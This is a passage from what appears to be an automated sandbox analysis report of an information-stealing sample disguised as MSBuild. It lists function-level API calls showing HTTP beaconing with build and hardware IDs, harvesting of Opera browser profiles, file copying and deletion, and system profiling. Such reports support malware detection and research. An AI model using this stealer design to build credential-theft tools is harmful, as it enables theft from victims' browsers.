                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD4
                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00404AEB
                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 00404B3F
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B4A
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00404B5F
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B69
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
                                                                                                                                                                                                                                              • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                                                                                                                                                                              • API String ID: 1585128682-3346224549
                                                                                                                                                                                                                                              • Opcode ID: 9d778b4aa2deb08cd358f78b548b6816cd00b3c1542e7757b00d46b6ee996e33
                                                                                                                                                                                                                                              • Instruction ID: 5fc5c06e662f0cc56ec579075a690d6072dddc9a0b5f03a20420b071163eae1a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d778b4aa2deb08cd358f78b548b6816cd00b3c1542e7757b00d46b6ee996e33
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E222C71801149EADB15E7E4C952BEEBBB8AF15304F54407EE601731D2DF782B0CCAA9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00417550 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 198stringfileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcat$wsprintf$File$CopyFindFirstMatchPathSpec
                                                                                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                              • API String ID: 3791670087-445461498
                                                                                                                                                                                                                                              • Opcode ID: 974bde728eb2ea4341a37141b836e6704171ada0683ba1d6d79cfbd9337a40f3
                                                                                                                                                                                                                                              • Instruction ID: 7ff546ba37fb225437adfdcfe4c42a1338871a9dd952cfc4639d17004bec3dc0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 974bde728eb2ea4341a37141b836e6704171ada0683ba1d6d79cfbd9337a40f3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A71D4B5904218ABCB10DFA5DC45EEE7B79FB48700F00459DF619A3190DB789A48CFA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00411020 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 166memorycomtimeCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?,004273DC,00000000), ref: 00411043
                                                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4), ref: 00411054
                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000), ref: 0041106E
                                                                                                                                                                                                                                              • CoSetProxyBlanket.OLE32(004273DC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000), ref: 004110A7
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00411106
                                                                                                                                                                                                                                                • Part of subcall function 00410F70: CoCreateInstance.OLE32(00427AB4,00000000,00000001,00427260,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?), ref: 00410F8D
                                                                                                                                                                                                                                                • Part of subcall function 00410F70: SysAllocString.OLEAUT32(?), ref: 00410F9C
                                                                                                                                                                                                                                                • Part of subcall function 00410F70: _wtoi64.MSVCRT ref: 00410FE2
                                                                                                                                                                                                                                                • Part of subcall function 00410F70: SysFreeString.OLEAUT32(?), ref: 00410FF8
                                                                                                                                                                                                                                                • Part of subcall function 00410F70: SysFreeString.OLEAUT32(00000000), ref: 00410FFB
                                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(004273F4,?,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?), ref: 00411140
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?), ref: 0041114C
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?,004273DC), ref: 00411153
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00411197
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0041117F
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                              • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
                                                                                                                                                                                                                                              • API String ID: 1611285705-2016369993
                                                                                                                                                                                                                                              • Opcode ID: 1e650331b11e195a696a9c7b5176a8fbbcc06761d9eaa63042d3f28111d4caa6
                                                                                                                                                                                                                                              • Instruction ID: 75a545c076d1dd2e0cda86b1f31a52cb2c57117cf048d23ae71c1147ee9a352d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e650331b11e195a696a9c7b5176a8fbbcc06761d9eaa63042d3f28111d4caa6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74515C71A01229BBCB20DF95DC45EFFBB78EF49B11F00421AF605A2290D6789A41CBE4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 004011E0 Relevance: 27.1, APIs: 12, Strings: 3, Instructions: 801fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00423334,?,004020FB,?,00423330,?,00000000,00000000,?,00000000), ref: 00401446
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00423338,?,00000000), ref: 004014BC
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0042333C,?,00000000), ref: 004014D6
                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00423348,?,?,?,00423344,?,004020FB,?,00423340,?,00000000), ref: 00401603
                                                                                                                                                                                                                                                • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00F6E978,?), ref: 0041001C
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,00F70418,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00401894
                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,L3B,?,?,?,?,?,0042334C,?,00000000), ref: 004018D7
                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,0042334C,?,00000000), ref: 004018E6
                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040180E
                                                                                                                                                                                                                                                • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401B61
                                                                                                                                                                                                                                                • Part of subcall function 00406E80: LocalFree.KERNEL32(?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F21
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00401BE1
                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?,?,00000000), ref: 00401C34
                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000), ref: 00401C43
                                                                                                                                                                                                                                                • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                              • String ID: %$L3B$\*.*
                                                                                                                                                                                                                                              • API String ID: 2220404975-1614187093
                                                                                                                                                                                                                                              • Opcode ID: d9c562cef0e5a590ee84e2ec893f91183f8c785d922770ffd99f33c19f8637d8
                                                                                                                                                                                                                                              • Instruction ID: 1f0ecdccfbf971c4eb3ba04f5591d09edb7ba5691986d76eb2288118b31a76ee
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9c562cef0e5a590ee84e2ec893f91183f8c785d922770ffd99f33c19f8637d8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5726B70801248EADB15EBA5C951BDDBBB85F19308F5440BEE605732D2DF782B4CCB69
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0040B030 Relevance: 21.7, APIs: 7, Strings: 5, Instructions: 658fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00F6E978,?), ref: 0041001C
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00426ABB,?,?,00000000), ref: 0040B0C2
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00426CF8,?,00000000), ref: 0040B13C
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00426CFC,?,00000000), ref: 0040B156
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,Opera,00426ACA,00426AC7,00426AC6,00426AC3,00426AC2,00426ABF,00426ABE,?,00000000), ref: 0040B1EB
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,Opera GX,?,00000000), ref: 0040B203
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,Opera Crypto,?,00000000), ref: 0040B21B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                              • String ID: :$Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                                              • API String ID: 2567437900-1444899082
                                                                                                                                                                                                                                              • Opcode ID: 5d42b56d7676d8b34d9992f1e80027433cf82ce389d1765d60d0a489b8323c70
                                                                                                                                                                                                                                              • Instruction ID: efbda9057b4a3320160d0838e4bb094c7ba51aae6ab1d3ada1da399397eb047e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d42b56d7676d8b34d9992f1e80027433cf82ce389d1765d60d0a489b8323c70
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31528030901248EACB15EBA5C955BDDBBB99F19304F5040BEE505732D2DBB82B4CCBB6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00410370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105memoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,0042708F,?,?,00000001), ref: 004103B7
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 004103C9
                                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 004103D4
                                                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410406
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00F6E978,?), ref: 0041001C
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,00000001), ref: 004104AA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                              • String ID: /
                                                                                                                                                                                                                                              • API String ID: 507856799-4001269591
                                                                                                                                                                                                                                              • Opcode ID: ab2540c32def370dc3ccb5b7f219a36ccb40806ac267110b0901d9de57956097
                                                                                                                                                                                                                                              • Instruction ID: c556474e9021bd53722cce9fd1be39607c0121b4687c47c7bc64da4ab7de49f3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab2540c32def370dc3ccb5b7f219a36ccb40806ac267110b0901d9de57956097
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67317371900219EBDB10DFD9DC85BEEB7B9FB48704F50406EF605A3281DB785A84CBA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00410300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410311
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00410318
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 00410327
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00410352
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                              • String ID: wwww
                                                                                                                                                                                                                                              • API String ID: 362916592-671953474
                                                                                                                                                                                                                                              • Opcode ID: 9a7f8c275463387799c76c2b5357eec89d0a484b96840c6e095eb03c68c04584
                                                                                                                                                                                                                                              • Instruction ID: 05270ee5c02940d31badd105e9dc8504ebe92e995e35f2b1e0709388ccb36dab
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a7f8c275463387799c76c2b5357eec89d0a484b96840c6e095eb03c68c04584
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BF0A775B00224ABE71C5B689C0EFAA7B1E9B46311F044365FE1ACB2D0DA70581446D5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 004103E9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410406
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,00000001), ref: 004104AA
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00F6E978,?), ref: 0041001C
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
